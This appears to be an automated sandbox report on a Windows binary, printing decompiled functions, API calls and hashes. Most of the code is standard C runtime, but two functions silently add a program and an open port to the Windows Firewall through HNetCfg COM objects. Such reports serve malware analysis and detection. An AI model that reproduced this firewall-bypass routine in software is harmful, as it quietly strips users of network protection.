Part of subcall function 00B1205C: GetModuleHandleW.KERNEL32(mscoree.dll,?,00B12094,00000000,?,00B1740E,000000FF,0000001E,?,00B1553F,00000000,00000001,00000000,?,00B13BC7,00000018), ref: 00B12066
Part of subcall function 00B1205C: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00B12076

ExitProcess.KERNEL32 ref: 00B12098

Memory Dump Source

Source File: 00000019.00000002.333493857.0000000000B11000.00000020.00020000.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000019.00000002.333483672.0000000000B10000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.333505191.0000000000B1C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.333514254.0000000000B1F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.333521365.0000000000B21000.00000002.00020000.sdmp Download File

Similarity

API ID: ExitProcess$AddressHandleModuleProc___crt
String ID:
API String ID: 2427264223-0
Opcode ID: a6ba49612bb44511e2c64a9d120193b9e8a5902d53aae14488af6669f9810053
Instruction ID: 608183d77aa2757645e25242e491c9fe24fe57f64682ae62dc01b89fe4d39705
Opcode Fuzzy Hash: a6ba49612bb44511e2c64a9d120193b9e8a5902d53aae14488af6669f9810053
Instruction Fuzzy Hash: 70B09231000108FBCB212F12DC0E88A7F6AEB853A0B908120F8080A071DF72EDA3EA90

Uniqueness

Uniqueness Score: -1.00%

Function 00B14D4A, Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B14D4A(intOrPtr _a4) {
				void* _t6;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0xb2093c = _t6;
				if(_t6 != 0) {
					 *0xb20a98 = 1;
					return 1;
				} else {
					return _t6;
				}
			}

0x00b14d5f
0x00b14d65
0x00b14d6c
0x00b14d73
0x00b14d79
0x00b14d6f
0x00b14d6f
0x00b14d6f

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 00B14D5F

Memory Dump Source

Source File: 00000019.00000002.333493857.0000000000B11000.00000020.00020000.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000019.00000002.333483672.0000000000B10000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.333505191.0000000000B1C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.333514254.0000000000B1F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.333521365.0000000000B21000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 5dd198cab61195b0a79ee66e4a6fa95a50339858cfdeae01cc7d309ee8cceb00
Instruction ID: f93a3a92691233efe9b25659c43872bc4bd44f6deeb434d2053d1643afd309be
Opcode Fuzzy Hash: 5dd198cab61195b0a79ee66e4a6fa95a50339858cfdeae01cc7d309ee8cceb00
Instruction Fuzzy Hash: 0AD05E766A07099EEB106F757C097663BDCD784395F508436B80DC7591EA70C9C1CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00B122A3, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 25%

			E00B122A3(intOrPtr _a4) {
				void* __ebp;
				void* _t2;
				void* _t3;
				void* _t4;
				void* _t5;
				void* _t6;
				void* _t9;

				_push(0);
				_push(0);
				_push(_a4);
				_t2 = E00B12177(_t3, _t4, _t5, _t6, _t9); // executed
				return _t2;
			}

0x00b122a8
0x00b122aa
0x00b122ac
0x00b122af
0x00b122b8

APIs

_doexit.LIBCMT ref: 00B122AF

Part of subcall function 00B12177: __lock.LIBCMT ref: 00B12185
Part of subcall function 00B12177: __decode_pointer.LIBCMT ref: 00B121BC
Part of subcall function 00B12177: __decode_pointer.LIBCMT ref: 00B121D1
Part of subcall function 00B12177: __decode_pointer.LIBCMT ref: 00B121FB
Part of subcall function 00B12177: __decode_pointer.LIBCMT ref: 00B12211
Part of subcall function 00B12177: __decode_pointer.LIBCMT ref: 00B1221E
Part of subcall function 00B12177: __initterm.LIBCMT ref: 00B1224D
Part of subcall function 00B12177: __initterm.LIBCMT ref: 00B1225D

Memory Dump Source

Source File: 00000019.00000002.333493857.0000000000B11000.00000020.00020000.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000019.00000002.333483672.0000000000B10000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.333505191.0000000000B1C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.333514254.0000000000B1F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.333521365.0000000000B21000.00000002.00020000.sdmp Download File

Similarity

API ID: __decode_pointer$__initterm$__lock_doexit
String ID:
API String ID: 1597249276-0
Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
Instruction ID: 8366765f9ca0f5c8775136addf8c1896c08d446fc4cd1b061f1dc52261baa170
Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
Instruction Fuzzy Hash: 25B01232A8030C33DA206642EC03F463F4D8BC1B60F640060FB0C2D1E1A9A3B9B2C0C9

Uniqueness

Uniqueness Score: -1.00%

Function 00B11058, Relevance: 1.5, APIs: 1, Instructions: 7comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00B1DB0C,00000000,00000001,00B1DB1C,?,00B11135,00000000), ref: 00B1106A

Memory Dump Source

Source File: 00000019.00000002.333493857.0000000000B11000.00000020.00020000.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000019.00000002.333483672.0000000000B10000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.333505191.0000000000B1C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.333514254.0000000000B1F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.333521365.0000000000B21000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: 3a6507e12a3ace13542bbdea822581890c230a4e01d4cc89352e2de978c5bd4f
Instruction ID: df02c1df6136591fadeabcf87d53bf0d84bf0489c6a68507613ab75beccec241
Opcode Fuzzy Hash: 3a6507e12a3ace13542bbdea822581890c230a4e01d4cc89352e2de978c5bd4f
Instruction Fuzzy Hash: B8B012307C8300F6DD1017505D47FC77EA16740F00F914880B202350F2C6E20090D601

Uniqueness

Uniqueness Score: -1.00%

Function 00B13148, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B13148() {
				void* _t1;

				_t1 = E00B130D6(0); // executed
				return _t1;
			}

0x00b1314a
0x00b13150

APIs

__encode_pointer.LIBCMT ref: 00B1314A

Part of subcall function 00B130D6: TlsGetValue.KERNEL32(00000000,?,00B1314F,00000000,00B15F7B,00B20398,00000000,00000314,?,00B13A4C,00B20398,Microsoft Visual C++ Runtime Library,00012010), ref: 00B130E8
Part of subcall function 00B130D6: TlsGetValue.KERNEL32(00000004,?,00B1314F,00000000,00B15F7B,00B20398,00000000,00000314,?,00B13A4C,00B20398,Microsoft Visual C++ Runtime Library,00012010), ref: 00B130FF
Part of subcall function 00B130D6: RtlEncodePointer.NTDLL(00000000,?,00B1314F,00000000,00B15F7B,00B20398,00000000,00000314,?,00B13A4C,00B20398,Microsoft Visual C++ Runtime Library,00012010), ref: 00B1313D

Memory Dump Source

Source File: 00000019.00000002.333493857.0000000000B11000.00000020.00020000.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000019.00000002.333483672.0000000000B10000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.333505191.0000000000B1C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.333514254.0000000000B1F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.333521365.0000000000B21000.00000002.00020000.sdmp Download File

Similarity

API ID: Value$EncodePointer__encode_pointer
String ID:
API String ID: 2585649348-0
Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
Instruction ID: 4d0dd2b1cf500ad7b8ba5b25daa2cbefbc8947f600ee3cc16652e75599293d77
Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00B11C57, Relevance: 7.6, APIs: 5, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00B11C57(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0xb1f008; // 0x101c184a
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0xb20128 = _t6;
				 *0xb20124 = _t22;
				 *0xb20120 = _t25;
				 *0xb2011c = _t21;
				 *0xb20118 = _t27;
				 *0xb20114 = _t26;
				 *0xb20140 = ss;
				 *0xb20134 = cs;
				 *0xb20110 = ds;
				 *0xb2010c = es;
				 *0xb20108 = fs;
				 *0xb20104 = gs;
				asm("pushfd");
				_pop( *0xb20138);
				 *0xb2012c =  *_t31;
				 *0xb20130 = _v0;
				 *0xb2013c =  &_a4;
				 *0xb20078 = 0x10001;
				_t11 =  *0xb20130; // 0x0
				 *0xb2002c = _t11;
				 *0xb20020 = 0xc0000409;
				 *0xb20024 = 1;
				_t12 =  *0xb1f008; // 0x101c184a
				_v812 = _t12;
				_t13 =  *0xb1f00c; // 0xefe3e7b5
				_v808 = _t13;
				 *0xb20070 = IsDebuggerPresent();
				_push(1);
				E00B14E10(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0xb1c1b4);
				if( *0xb20070 == 0) {
					_push(1);
					E00B14E10(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x00b11c57
0x00b11c57
0x00b11c57
0x00b11c57
0x00b11c57
0x00b11c57
0x00b11c57
0x00b11c5d
0x00b11c5f
0x00b11c5f
0x00b124f7
0x00b124fc
0x00b12502
0x00b12508
0x00b1250e
0x00b12514
0x00b1251a
0x00b12521
0x00b12528
0x00b1252f
0x00b12536
0x00b1253d
0x00b12544
0x00b12545
0x00b1254e
0x00b12556
0x00b1255e
0x00b12569
0x00b12573
0x00b12578
0x00b1257d
0x00b12587
0x00b12591
0x00b12596
0x00b1259c
0x00b125a1
0x00b125ad
0x00b125b2
0x00b125b4
0x00b125bc
0x00b125c7
0x00b125d4
0x00b125d6
0x00b125d8
0x00b125dd
0x00b125f1

APIs

IsDebuggerPresent.KERNEL32 ref: 00B125A7
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00B125BC
UnhandledExceptionFilter.KERNEL32(00B1C1B4), ref: 00B125C7
GetCurrentProcess.KERNEL32(C0000409), ref: 00B125E3
TerminateProcess.KERNEL32(00000000), ref: 00B125EA

Memory Dump Source

Source File: 00000019.00000002.333493857.0000000000B11000.00000020.00020000.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000019.00000002.333483672.0000000000B10000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.333505191.0000000000B1C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.333514254.0000000000B1F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.333521365.0000000000B21000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 4c6ccf5d0c79081fd37a8f430cacad1e68a7c4298e5fcba1d4b6dec94ae8d321
Instruction ID: b2bf1619432e4721063dd63a68eb6664ce2fe76fcc3755d7ef83ef89040d5eff
Opcode Fuzzy Hash: 4c6ccf5d0c79081fd37a8f430cacad1e68a7c4298e5fcba1d4b6dec94ae8d321
Instruction Fuzzy Hash: 9221C3B4861208DFD721EF64F84A6847BE0BB0C312F80815AF508A7662DF7456A6CF49

Uniqueness

Uniqueness Score: -1.00%

Function 00B117BE, Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 164
comCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E00B117BE(char* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v24;
				void* _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t54;
				void* _t59;
				intOrPtr* _t60;
				intOrPtr* _t61;
				intOrPtr* _t62;
				intOrPtr* _t63;
				intOrPtr* _t64;
				void* _t74;
				intOrPtr* _t75;
				void* _t76;
				intOrPtr* _t77;
				void* _t78;
				void* _t80;
				void* _t83;
				intOrPtr* _t90;
				intOrPtr* _t92;
				intOrPtr* _t94;
				intOrPtr* _t96;
				void* _t97;
				intOrPtr* _t98;
				intOrPtr* _t100;
				signed int _t120;

				_t115 = __edx;
				_t54 =  *0xb1f008; // 0x101c184a
				_v8 = _t54 ^ _t120;
				_v52 = _a4;
				_v48 = _a8;
				__imp__CoInitialize(0);
				_v36 = 0;
				_v32 = 0;
				_v40 = 0;
				_v44 = 0;
				_v28 = 0;
				_t59 = E00B180F0(__edx, "HNetCfg.FwMgr");
				__imp__CLSIDFromProgID(_t59,  &_v24);
				_t117 = _t59;
				if(_t59 >= 0) {
					_t100 = __imp__CoCreateInstance;
					_t74 =  *_t100( &_v24, 0, 5, 0xb1c17c,  &_v36);
					_t117 = _t74;
					if(_t74 >= 0) {
						_t75 = _v36;
						_t115 =  &_v32;
						_t76 =  *((intOrPtr*)( *_t75 + 0x1c))(_t75,  &_v32);
						_t117 = _t76;
						if(_t76 >= 0) {
							_t77 = _v32;
							_t115 =  &_v40;
							_t78 =  *((intOrPtr*)( *_t77 + 0x1c))(_t77,  &_v40);
							_t117 = _t78;
							if(_t78 >= 0) {
								_t80 = E00B180F0( &_v40, "HNetCfg.FwAuthorizedApplication");
								__imp__CLSIDFromProgID(_t80,  &_v24);
								_t117 = _t80;
								if(_t80 >= 0) {
									_t83 =  *_t100( &_v24, 0, 5, 0xb1c17c,  &_v28);
									_t117 = _t83;
									if(_t83 >= 0) {
										 *((intOrPtr*)( *_v28 + 0x28))(_v28, E00B180F0( &_v40, _v48));
										 *((intOrPtr*)( *_v28 + 0x20))(_v28, E00B180F0(_t115, _v52));
										_t90 = _v28;
										 *((intOrPtr*)( *_t90 + 0x38))(_t90, 0);
										_t92 = _v28;
										 *((intOrPtr*)( *_t92 + 0x30))(_t92, 2);
										_t94 = _v28;
										 *((intOrPtr*)( *_t94 + 0x48))(_t94, 1);
										_t96 = _v40;
										_t115 =  &_v44;
										_t97 =  *((intOrPtr*)( *_t96 + 0x50))(_t96,  &_v44);
										_t117 = _t97;
										if(_t97 >= 0) {
											_t98 = _v44;
											_t117 =  *((intOrPtr*)( *_t98 + 0x20))(_t98, _v28);
										}
									}
								}
							}
						}
					}
				}
				_t60 = _v28;
				if(_t60 != 0) {
					 *((intOrPtr*)( *_t60 + 8))(_t60);
				}
				_t61 = _v44;
				if(_t61 != 0) {
					 *((intOrPtr*)( *_t61 + 8))(_t61);
				}
				_t62 = _v40;
				if(_t62 != 0) {
					 *((intOrPtr*)( *_t62 + 8))(_t62);
				}
				_t63 = _v32;
				if(_t63 != 0) {
					 *((intOrPtr*)( *_t63 + 8))(_t63);
				}
				_t64 = _v36;
				if(_t64 != 0) {
					 *((intOrPtr*)( *_t64 + 8))(_t64);
				}
				__imp__CoUninitialize();
				return E00B11C57(_t117, _t100, _v8 ^ _t120, _t115, 0, _t117);
			}

0x00b117be
0x00b117c4
0x00b117cb
0x00b117d4
0x00b117dd
0x00b117e0
0x00b117ef
0x00b117f2
0x00b117f5
0x00b117f8
0x00b117fb
0x00b117fe
0x00b11804
0x00b1180a
0x00b1180e
0x00b11814
0x00b1182a
0x00b1182c
0x00b11830
0x00b11836
0x00b1183b
0x00b11840
0x00b11843
0x00b11847
0x00b1184d
0x00b11852
0x00b11857
0x00b1185a
0x00b1185e
0x00b1186d
0x00b11873
0x00b11879
0x00b1187d
0x00b11893
0x00b11895
0x00b11899
0x00b118ac
0x00b118c0
0x00b118c3
0x00b118ca
0x00b118cd
0x00b118d5
0x00b118d8
0x00b118e0
0x00b118e3
0x00b118e8
0x00b118ed
0x00b118f0
0x00b118f4
0x00b118f6
0x00b11902
0x00b11902
0x00b118f4
0x00b11899
0x00b1187d
0x00b1185e
0x00b11847
0x00b11830
0x00b11904
0x00b11909
0x00b1190e
0x00b1190e
0x00b11911
0x00b11916
0x00b1191b
0x00b1191b
0x00b1191e
0x00b11923
0x00b11928
0x00b11928
0x00b1192b
0x00b11930
0x00b11935
0x00b11935
0x00b11938
0x00b1193d
0x00b11942
0x00b11942
0x00b11945
0x00b1195b

APIs

CoInitialize.OLE32(00000000), ref: 00B117E0
_com_util::ConvertStringToBSTR.COMSUPP ref: 00B117FE
CLSIDFromProgID.OLE32(00000000,HNetCfg.FwMgr,?), ref: 00B11804
CoCreateInstance.OLE32(?,00000000,00000005,00B1C17C,?), ref: 00B1182A
_com_util::ConvertStringToBSTR.COMSUPP ref: 00B1186D

Part of subcall function 00B180F0: lstrlenA.KERNEL32(?,101C184A,?,80004005,?,000000FE,?,00B11112,00000000), ref: 00B18137
Part of subcall function 00B180F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,80004005,?,000000FE,?,00B11112,00000000), ref: 00B1814D
Part of subcall function 00B180F0: GetLastError.KERNEL32(?,80004005,?,000000FE,?,00B11112,00000000), ref: 00B1815C
Part of subcall function 00B180F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,000000FE,?,00B11112,00000000), ref: 00B181EB
Part of subcall function 00B180F0: GetLastError.KERNEL32(?,000000FE,?,00B11112,00000000), ref: 00B18206
Part of subcall function 00B180F0: SysAllocString.OLEAUT32(00000000), ref: 00B18221

CLSIDFromProgID.OLE32(00000000,HNetCfg.FwAuthorizedApplication,?), ref: 00B11873
CoCreateInstance.OLE32(?,00000000,00000005,00B1C17C,?), ref: 00B11893
_com_util::ConvertStringToBSTR.COMSUPP ref: 00B118A3

Part of subcall function 00B180F0: _malloc.LIBCMT ref: 00B181A1

_com_util::ConvertStringToBSTR.COMSUPP ref: 00B118B7
CoUninitialize.OLE32 ref: 00B11945

Strings

HNetCfg.FwMgr, xrefs: 00B117EA
HNetCfg.FwAuthorizedApplication, xrefs: 00B11868

Memory Dump Source

Source File: 00000019.00000002.333493857.0000000000B11000.00000020.00020000.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000019.00000002.333483672.0000000000B10000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.333505191.0000000000B1C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.333514254.0000000000B1F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.333521365.0000000000B21000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Convert_com_util::$ByteCharCreateErrorFromInstanceLastMultiProgWide$AllocInitializeUninitialize_malloclstrlen
String ID: HNetCfg.FwAuthorizedApplication$HNetCfg.FwMgr
API String ID: 4233194485-1951265404
Opcode ID: 40c89c1f479d81735772762cffa5f7248adfd13b892137fae54b3d4f9ef97080
Instruction ID: 1efecb111b58b4f1b44fdcc1e5890ceabfce0a4838e57041c9956e7007f83114
Opcode Fuzzy Hash: 40c89c1f479d81735772762cffa5f7248adfd13b892137fae54b3d4f9ef97080
Instruction Fuzzy Hash: B2512B71A00219AFCB10DBA8C889DEEBBF9FF89710B544995F915F7250DB319C82CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00B1195C, Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 178
comCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E00B1195C(char* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v24;
				void* _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t61;
				void* _t66;
				intOrPtr* _t67;
				intOrPtr* _t68;
				intOrPtr* _t69;
				intOrPtr* _t70;
				intOrPtr* _t71;
				void* _t81;
				intOrPtr* _t82;
				void* _t83;
				intOrPtr* _t84;
				void* _t85;
				void* _t87;
				void* _t90;
				intOrPtr* _t93;
				intOrPtr* _t95;
				intOrPtr* _t100;
				intOrPtr* _t102;
				intOrPtr* _t104;
				intOrPtr* _t106;
				void* _t107;
				intOrPtr* _t108;
				char _t130;
				signed int _t133;

				_t128 = __edx;
				_t61 =  *0xb1f008; // 0x101c184a
				_v8 = _t61 ^ _t133;
				_v56 = _a4;
				_t130 = 0;
				_v60 = _a8;
				__imp__CoInitialize(0);
				_v32 = 0;
				_v44 = 0;
				_v40 = 0;
				_v36 = 0;
				_v28 = 0;
				_t66 = E00B180F0(__edx, "HNetCfg.FwMgr");
				__imp__CLSIDFromProgID(_t66,  &_v24);
				_t110 = _t66;
				if(_t66 >= 0) {
					_t129 = __imp__CoCreateInstance;
					_t81 =  *_t129( &_v24, 0, 5, 0xb1c17c,  &_v32);
					_t110 = _t81;
					if(_t81 >= 0) {
						_t82 = _v32;
						_t128 =  &_v44;
						_t83 =  *((intOrPtr*)( *_t82 + 0x1c))(_t82,  &_v44);
						_t110 = _t83;
						if(_t83 >= 0) {
							_t84 = _v44;
							_t128 =  &_v40;
							_t85 =  *((intOrPtr*)( *_t84 + 0x1c))(_t84,  &_v40);
							_t110 = _t85;
							if(_t85 >= 0) {
								_t87 = E00B180F0( &_v40, "HNetCfg.FwOpenPort");
								__imp__CLSIDFromProgID(_t87,  &_v24);
								_t110 = _t87;
								if(_t87 >= 0) {
									_t90 =  *_t129( &_v24, 0, 5, 0xb1c17c,  &_v28);
									_t110 = _t90;
									if(_t90 >= 0) {
										_t129 = _v60;
										_v52 = 0;
										_v48 = 0x100;
										if(E00B11071(_v60,  &_v48,  &_v52) != 0) {
											_t93 = _v28;
											 *((intOrPtr*)( *_t93 + 0x38))(_t93, _v52);
											_t95 = _v28;
											 *((intOrPtr*)( *_t95 + 0x30))(_t95, _v48);
											 *((intOrPtr*)( *_v28 + 0x20))(_v28, E00B180F0( &_v40, _v56));
											_t100 = _v28;
											 *((intOrPtr*)( *_t100 + 0x40))(_t100, 0);
											_t102 = _v28;
											 *((intOrPtr*)( *_t102 + 0x28))(_t102, 2);
											_t104 = _v28;
											 *((intOrPtr*)( *_t104 + 0x50))(_t104, 1);
											_t106 = _v40;
											_t128 =  &_v36;
											_t107 =  *((intOrPtr*)( *_t106 + 0x48))(_t106,  &_v36);
											_t110 = _t107;
											if(_t107 >= 0) {
												_t108 = _v36;
												_t110 =  *((intOrPtr*)( *_t108 + 0x20))(_t108, _v28);
											}
										}
										_t130 = 0;
									}
								}
							}
						}
					}
				}
				_t67 = _v28;
				if(_t67 != _t130) {
					 *((intOrPtr*)( *_t67 + 8))(_t67);
				}
				_t68 = _v36;
				if(_t68 != _t130) {
					 *((intOrPtr*)( *_t68 + 8))(_t68);
				}
				_t69 = _v40;
				if(_t69 != _t130) {
					 *((intOrPtr*)( *_t69 + 8))(_t69);
				}
				_t70 = _v44;
				if(_t70 != _t130) {
					 *((intOrPtr*)( *_t70 + 8))(_t70);
				}
				_t71 = _v32;
				if(_t71 != _t130) {
					 *((intOrPtr*)( *_t71 + 8))(_t71);
				}
				__imp__CoUninitialize();
				return E00B11C57(_t110, _t110, _v8 ^ _t133, _t128, _t129, _t130);
			}

0x00b1195c
0x00b11962
0x00b11969
0x00b11972
0x00b11978
0x00b1197b
0x00b1197e
0x00b1198d
0x00b11990
0x00b11993
0x00b11996
0x00b11999
0x00b1199c
0x00b119a2
0x00b119a8
0x00b119ac
0x00b119b2
0x00b119c8
0x00b119ca
0x00b119ce
0x00b119d4
0x00b119d9
0x00b119de
0x00b119e1
0x00b119e5
0x00b119eb
0x00b119f0
0x00b119f5
0x00b119f8
0x00b119fc
0x00b11a0b
0x00b11a11
0x00b11a17
0x00b11a1b
0x00b11a31
0x00b11a33
0x00b11a37
0x00b11a3d
0x00b11a43
0x00b11a4a
0x00b11a59
0x00b11a5b
0x00b11a64
0x00b11a67
0x00b11a70
0x00b11a84
0x00b11a87
0x00b11a8f
0x00b11a92
0x00b11a9a
0x00b11a9d
0x00b11aa5
0x00b11aa8
0x00b11aad
0x00b11ab2
0x00b11ab5
0x00b11ab9
0x00b11abb
0x00b11ac7
0x00b11ac7
0x00b11ab9
0x00b11ac9
0x00b11ac9
0x00b11a37
0x00b11a1b
0x00b119fc
0x00b119e5
0x00b119ce
0x00b11acb
0x00b11ad0
0x00b11ad5
0x00b11ad5
0x00b11ad8
0x00b11add
0x00b11ae2
0x00b11ae2
0x00b11ae5
0x00b11aea
0x00b11aef
0x00b11aef
0x00b11af2
0x00b11af7
0x00b11afc
0x00b11afc
0x00b11aff
0x00b11b04
0x00b11b09
0x00b11b09
0x00b11b0c
0x00b11b22

APIs

CoInitialize.OLE32(00000000), ref: 00B1197E
_com_util::ConvertStringToBSTR.COMSUPP ref: 00B1199C
CLSIDFromProgID.OLE32(00000000,HNetCfg.FwMgr,?), ref: 00B119A2
CoCreateInstance.OLE32(?,00000000,00000005,00B1C17C,?), ref: 00B119C8
_com_util::ConvertStringToBSTR.COMSUPP ref: 00B11A0B

Part of subcall function 00B180F0: lstrlenA.KERNEL32(?,101C184A,?,80004005,?,000000FE,?,00B11112,00000000), ref: 00B18137
Part of subcall function 00B180F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,80004005,?,000000FE,?,00B11112,00000000), ref: 00B1814D
Part of subcall function 00B180F0: GetLastError.KERNEL32(?,80004005,?,000000FE,?,00B11112,00000000), ref: 00B1815C
Part of subcall function 00B180F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,000000FE,?,00B11112,00000000), ref: 00B181EB
Part of subcall function 00B180F0: GetLastError.KERNEL32(?,000000FE,?,00B11112,00000000), ref: 00B18206
Part of subcall function 00B180F0: SysAllocString.OLEAUT32(00000000), ref: 00B18221

CLSIDFromProgID.OLE32(00000000,HNetCfg.FwOpenPort,?), ref: 00B11A11
CoCreateInstance.OLE32(?,00000000,00000005,00B1C17C,?), ref: 00B11A31

Part of subcall function 00B11071: __wcstoui64.LIBCMT ref: 00B110DB

_com_util::ConvertStringToBSTR.COMSUPP ref: 00B11A7B

Part of subcall function 00B180F0: _malloc.LIBCMT ref: 00B181A1

CoUninitialize.OLE32 ref: 00B11B0C

Strings

HNetCfg.FwOpenPort, xrefs: 00B11A06
HNetCfg.FwMgr, xrefs: 00B11988

Memory Dump Source

Source File: 00000019.00000002.333493857.0000000000B11000.00000020.00020000.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000019.00000002.333483672.0000000000B10000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.333505191.0000000000B1C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.333514254.0000000000B1F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.333521365.0000000000B21000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Convert_com_util::$ByteCharCreateErrorFromInstanceLastMultiProgWide$AllocInitializeUninitialize__wcstoui64_malloclstrlen
String ID: HNetCfg.FwMgr$HNetCfg.FwOpenPort
API String ID: 3570467124-3777566516
Opcode ID: ec46d99ab0c6a24b75ef69ee241501e46bff5b7b7935a94914602d43083c97d7
Instruction ID: 74f89001f3e11d503f738500330b3794fcaa2a4ea1da2384ac0db6c9e1f21f0a
Opcode Fuzzy Hash: ec46d99ab0c6a24b75ef69ee241501e46bff5b7b7935a94914602d43083c97d7
Instruction Fuzzy Hash: 0351F775A01219AFCB00DFE8C889DEEBBF9EF4D700B544895F601EB251DB71A981CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00B1323D, Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00B1323D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t23;
				intOrPtr _t28;
				intOrPtr _t32;
				intOrPtr _t46;
				void* _t47;

				_t35 = __ebx;
				_push(0xc);
				_push(0xb1dd18);
				E00B13F70(__ebx, __edi, __esi);
				_t45 = L"KERNEL32.DLL";
				_t23 = GetModuleHandleW(L"KERNEL32.DLL");
				if(_t23 == 0) {
					_t23 = E00B12003(_t45);
				}
				 *(_t47 - 0x1c) = _t23;
				_t46 =  *((intOrPtr*)(_t47 + 8));
				 *((intOrPtr*)(_t46 + 0x5c)) = 0xb1c870;
				 *((intOrPtr*)(_t46 + 0x14)) = 1;
				if(_t23 != 0) {
					_t35 = GetProcAddress;
					 *((intOrPtr*)(_t46 + 0x1f8)) = GetProcAddress(_t23, "EncodePointer");
					 *((intOrPtr*)(_t46 + 0x1fc)) = GetProcAddress( *(_t47 - 0x1c), "DecodePointer");
				}
				 *((intOrPtr*)(_t46 + 0x70)) = 1;
				 *((char*)(_t46 + 0xc8)) = 0x43;
				 *((char*)(_t46 + 0x14b)) = 0x43;
				 *(_t46 + 0x68) = 0xb1f010;
				E00B13C3D(_t35, 0xd);
